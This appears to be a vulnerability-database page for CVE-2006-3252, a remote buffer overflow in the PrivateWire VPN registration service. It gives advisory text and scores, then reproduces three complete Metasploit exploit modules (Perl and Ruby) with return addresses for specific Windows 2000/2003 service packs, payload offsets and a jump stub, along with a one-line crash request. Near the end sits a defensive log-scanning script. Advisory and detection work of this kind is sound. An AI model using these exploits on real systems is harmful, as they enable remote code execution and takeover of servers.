CVE-2006-3252
CVSS 7.5
Published: 2006-06-27 14:05:00
Revised: 2011-03-07 21:38:12

[Original] Buffer overflow in the Online Registration Facility for Algorithmic Research PrivateWire VPN software up to 3.7 allows remote attackers to execute arbitrary code via a long GET request.


[CNNVD] Algorithmic Research PrivateWire Online Registration Remote Buffer Overflow Vulnerability (CNNVD-200606-516)

        Algorithmic Research PrivateWire is a security suite that protects communication between clients and servers.
        PrivateWire contains a buffer overflow in its handling of online registration requests. A remote attacker can send an overlong GET request to overflow the buffer, execute arbitrary instructions and take control of the server.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3252
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3252
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-516
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/2549
(UNKNOWN)  VUPEN  ADV-2006-2549
http://www.securityfocus.com/bid/18647
(UNKNOWN)  BID  18647
http://www.securityfocus.com/archive/1/archive/1/438329/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060626 ERNW Security Advisory 01/2006
http://xforce.iss.net/xforce/xfdb/27430
(UNKNOWN)  XF  privatewire-registration-bo(27430)
http://securitytracker.com/id?1016382
(UNKNOWN)  SECTRACK  1016382
http://securityreason.com/securityalert/1152
(UNKNOWN)  SREASON  1152
http://secunia.com/advisories/20812
(UNKNOWN)  SECUNIA  20812

- Vulnerability information

Algorithmic Research PrivateWire Online Registration Remote Buffer Overflow Vulnerability
High risk  Buffer overflow
2006-06-27 00:00:00 2006-06-28 00:00:00
Remote
        Algorithmic Research PrivateWire is a security suite that protects communication between clients and servers.
        PrivateWire contains a buffer overflow in its handling of online registration requests. A remote attacker can send an overlong GET request to overflow the buffer, execute arbitrary instructions and take control of the server.

- Advisories and patches

        No data available

- Vulnerability information (2680)

PrivateWire Gateway 3.7 Remote Buffer Overflow Exploit (win32) (EDBID:2680)
windows remote
2006-10-29 Verified
80 Michael Thumann
N/A
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

##
# From the author:
# This file may only be distributed as part of the Metasploit Framework.
# Any other use needs a written permission from the author.
##

package Msf::Exploit::privatewire_gateway_win32;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'  => 'Private Wire Gateway Buffer Overflow (win32)',
	'Version'  => '$Rev$',
	'Authors' =>
	  [
		'Michael Thumann  <mthumann[at]ernw.de>',
	  ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32' ],
	'Priv'  => 1,

	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 80],
		'PATH'  => [1, 'DATA', 'Installation Path of Privatewire','C:\Cipgw'],
	  },

	'Payload' =>
	  {
		'Space'    => 8000,
		'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x1b",
		'Prepend'  => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
	  },

	'Description'  => Pex::Text::Freeform(qq{
        This exploits a buffer overflow in the ADMCREG.EXE used
        in the PrivateWire Online Registration Facility. .
}),

	'Refs'  =>
	  [
		['BID', '18647'],
	  ],

	'DefaultTarget' => 4,
	'Targets' => [
		['Windows 2000 English SP0', 0x77e3c289], # jmp esp USER32.DLL
		['Windows 2000 English SP1', 0x77e3cb4c], # jmp esp USER32.DLL
		['Windows 2000 English SP2', 0x77e3af64], # jmp esp USER32.DLL
		['Windows 2000 English SP3', 0x77e388a7], # jmp esp USER32.DLL
		['Windows 2000 English SP4', 0x77e3c256], # jmp esp USER32.DLL
		['Windows 2003 English SP0/SP1', 0x77d74c94], # jmp esp USER32.DLL
		['Debugging', 0x41414141], # Crash
	  ],

	'Keys' => ['privatewire'],

	'DisclosureDate' => 'June 26 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $path        = $self->GetVar('PATH');
	my $path_offset = length($path)-8;

	my $target = $self->Targets->[$target_idx];

	my $pattern = Pex::Text::AlphaNumText(8192);
	my $jmp = # add 25 to ecx and jmp
	  "\x6a\x19".
	  "\x58".
	  "\x01\xc1".
	  "\xff\xe1";
	substr($pattern, 0, length($shellcode), $shellcode);
	substr($pattern, 8156- $path_offset, 4, pack('V', $target->[1]));
	substr($pattern, 8160, length($jmp), $jmp);

	my $request = "GET /" . $pattern . " HTTP/1.0\r\n\r\n";

	$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using jmp esp at 0x%.8x...", $target->[1]));

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$s->Send($request);
	$s->Close();
	return;
}

1;

# milw0rm.com [2006-10-29]

- Vulnerability information (16760)

Private Wire Gateway Buffer Overflow (EDBID:16760)
windows remote
2010-04-30 Verified
80 metasploit
N/A
##
# $Id: privatewire_gateway.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

# This file may only be distributed as part of the Metasploit Framework.
# Any other use needs a written permission from the author.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Private Wire Gateway Buffer Overflow',
			'Description'    => %q{
					This exploits a buffer overflow in the ADMCREG.EXE used
				in the PrivateWire Online Registration Facility.
			},
			'Author'         => 'Michael Thumann <mthumann[at]ernw.de>',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					['CVE', '2006-3252'],
					['OSVDB', '26861'],
					['BID', '18647'],
				],
			'Payload'        =>
				{
					'Space'    => 8000,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x1b",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 English SP0',     { 'Ret' => 0x77e3c289 }], # jmp esp user32.dll
					['Windows 2000 English SP1',     { 'Ret' => 0x77e3cb4c }], # jmp esp user32.dll
					['Windows 2000 English SP2',     { 'Ret' => 0x77e3af64 }], # jmp esp user32.dll
					['Windows 2000 English SP3',     { 'Ret' => 0x77e388a7 }], # jmp esp user32.dll
					['Windows 2000 English SP4',     { 'Ret' => 0x77e3c256 }], # jmp esp user32.dll
					['Windows 2003 English SP0/SP1', { 'Ret' => 0x77d74c94 }], # jmp esp user32.dll
					['Debugging',                    { 'Ret' => 0x41414141 }], # crash
				],
			'DefaultTarget'  => 4,
			'DisclosureDate' => 'Jun 26 2006'))

		register_options(
			[
				OptString.new('PATH', [ true, "Installation path of Privatewire", 'C:\Cipgw' ])
			], self.class)
	end

	def exploit
		# add 25 to ecx and jmp
		jmp = "\x6a\x19\x58\x01\xc1\xff\xe1"

		path_offset = datastore['PATH'].length - 8

		pattern                            = rand_text_alphanumeric(8192)
		pattern[0, payload.encoded.length] = payload.encoded
		pattern[8156 - path_offset, 4]     = [target.ret].pack('V')
		pattern[8160, jmp.length]          = jmp

		print_status("Trying #{target.name} using jmp esp at #{"%.8x" % target.ret}")

		send_request_raw({
				'uri' => "/" + pattern
			}, 2)
	end

end

- Vulnerability information (F82976)

Private Wire Gateway Buffer Overflow (PacketStormID:F82976)
2009-11-26 00:00:00
Michael Thumann  metasploit.com
exploit,overflow
CVE-2006-3252

This exploits a buffer overflow in the ADMCREG.EXE used in the PrivateWire Online Registration Facility.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


# This file may only be distributed as part of the Metasploit Framework.
# Any other use needs a written permission from the author.

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Private Wire Gateway Buffer Overflow',
			'Description'    => %q{
        This exploits a buffer overflow in the ADMCREG.EXE used
        in the PrivateWire Online Registration Facility.
			},
			'Author'         => 'Michael Thumann <mthumann[at]ernw.de>',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2006-3252'],
					['OSVDB', '26861'],
					['BID', '18647'],
				],
			'Payload'        =>
				{
					'Space'    => 8000,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x1b",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Windows 2000 English SP0',     { 'Ret' => 0x77e3c289 }], # jmp esp user32.dll
					['Windows 2000 English SP1',     { 'Ret' => 0x77e3cb4c }], # jmp esp user32.dll
					['Windows 2000 English SP2',     { 'Ret' => 0x77e3af64 }], # jmp esp user32.dll
					['Windows 2000 English SP3',     { 'Ret' => 0x77e388a7 }], # jmp esp user32.dll
					['Windows 2000 English SP4',     { 'Ret' => 0x77e3c256 }], # jmp esp user32.dll
					['Windows 2003 English SP0/SP1', { 'Ret' => 0x77d74c94 }], # jmp esp user32.dll
					['Debugging',                    { 'Ret' => 0x41414141 }], # crash
				],	
			'DefaultTarget'  => 4,
			'DisclosureDate' => 'Jun 26 2006'))
			
			register_options( 
				[ 
					OptString.new('PATH', [ true, "Installation path of Privatewire", 'C:\Cipgw' ])
				], self.class)
	end

	def exploit
		# add 25 to ecx and jmp
		jmp = "\x6a\x19\x58\x01\xc1\xff\xe1"
			
		path_offset = datastore['PATH'].length - 8
		
		pattern                            = rand_text_alphanumeric(8192)
		pattern[0, payload.encoded.length] = payload.encoded
		pattern[8156 - path_offset, 4]     = [target.ret].pack('V')
		pattern[8160, jmp.length]          = jmp

		print_status("Trying #{target.name} using jmp esp at #{"%.8x" % target.ret}")

		send_request_raw({
				'uri' => "/" + pattern
			}, 2)
	end

end

- Vulnerability information

26861
PrivateWire Registration Functionality GET Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A buffer overflow exists in PrivateWire. The registration functionality fails to validate GET requests resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2006-06-26 2005-12-09
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author

- Vulnerability information

Algorithmic Research PrivateWire Online Registration Remote Buffer Overflow Vulnerability
Boundary Condition Error 18647
Yes No
2006-06-26 12:00:00 2007-05-30 06:01:00
Michael Thumann has been credited for the discovery of this vulnerability

- Affected program versions

Algorithmic Research PrivateWire Gateway 3.7

- Vulnerability discussion

PrivateWire online registration is prone to a remote buffer-overflow vulnerability.

The application fails to properly check boundary conditions when handling GET requests.

This issue allows attackers to execute arbitrary machine code in the context of the affected application software.

PrivateWire 3.7 is vulnerable to this issue; previous versions may also be affected.

- Exploit

The following HTTP GET request is sufficient to demonstrate this issue by crashing the application:
GET /<8160 'A' characters>.
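The traffic pattern described above (a single GET whose path runs to thousands of bytes, here 8160 'A' characters) is easy to pick out of a web-server access log, whatever the payload bytes are. The following is an added example, not part of the BID write-up nor of any PrivateWire or Metasploit code: it parses Common Log Format lines, flags request URIs longer than a threshold, and notes when the path is one repeated byte, the shape of a crash probe. The log lines, the 2048-byte threshold, and the names CLF_RE, inspect_log_line and scan are all constructed for this example.

```python
"""Flag oversized GET request lines in web-server access logs.

Added example for the CVE-2006-3252 record; not code from the page,
from Algorithmic Research, or from Metasploit. Sample data is constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Common Log Format: host ident user [time] "request" status bytes
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')

# Assumption: a registration endpoint only ever sees short paths, so a
# URI anywhere near the 8160-byte crash length quoted in the advisory is
# hostile. 2048 bytes is a conservative cut-off chosen for this example.
MAX_URI_LEN = 2048


@dataclass
class Finding:
    client: str
    timestamp: str
    method: str
    uri_len: int
    reason: str


def parse_request_line(req: str) -> Optional[Tuple[str, str, str]]:
    """Split 'GET /path HTTP/1.0' into (method, uri, version).

    Returns None when the request line is not exactly three tokens; a
    malformed request line is itself worth reporting, so callers handle None.
    """
    parts = req.split(" ")
    if len(parts) != 3:
        return None
    return parts[0], parts[1], parts[2]


def inspect_log_line(line: str, max_uri_len: int = MAX_URI_LEN) -> Optional[Finding]:
    """Return a Finding for a suspicious log line, or None if it looks benign."""
    m = CLF_RE.match(line)
    if not m:
        return None  # not CLF; out of scope for this detector
    client, ts, req, _status, _size = m.groups()
    parsed = parse_request_line(req)
    if parsed is None:
        return Finding(client, ts, "?", len(req), "malformed request line")
    method, uri, _version = parsed
    if len(uri) > max_uri_len:
        reason = f"URI length {len(uri)} exceeds {max_uri_len}"
        # A long run of one repeated byte is the classic crash-probe shape.
        body = uri.lstrip("/")
        if body and len(set(body)) == 1:
            reason += f" (single repeated byte {body[0]!r})"
        return Finding(client, ts, method, len(uri), reason)
    return None


def scan(lines: List[str], max_uri_len: int = MAX_URI_LEN) -> List[Finding]:
    """Run inspect_log_line over every line and keep only the findings."""
    return [f for f in (inspect_log_line(ln, max_uri_len) for ln in lines) if f]


# Constructed sample log: one benign request, one crash-style probe of
# 8160 'A' bytes (the length quoted in the BID write-up), one long
# alphanumeric path such as an encoded payload would produce, and one
# malformed request line.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Jun/2006:10:00:01 +0000] "GET /register.html HTTP/1.0" 200 512',
    '10.0.0.9 - - [26/Jun/2006:10:00:02 +0000] "GET /' + "A" * 8160 + ' HTTP/1.0" 400 0',
    '10.0.0.9 - - [26/Jun/2006:10:00:03 +0000] "GET /' + "xyz" * 2800 + ' HTTP/1.0" 500 0',
    '10.0.0.7 - - [26/Jun/2006:10:00:04 +0000] "GET" 400 0',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.timestamp} {f.client} {f.method} len={f.uri_len}: {f.reason}")
```

Length alone is the useful signal here: the page's own modules fill the path with 8192 random alphanumeric bytes, so a content signature would miss them while a URI-length rule catches both the bare crash probe and the encoded payload. Because the affected listener is on port 80 in front of the registration binary, the same threshold can be enforced upstream in a reverse proxy or WAF (most reject over-long URIs with a 414) rather than only reported after the fact.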

The following exploit code is available:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.

- References


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are maintained on MITRE's websites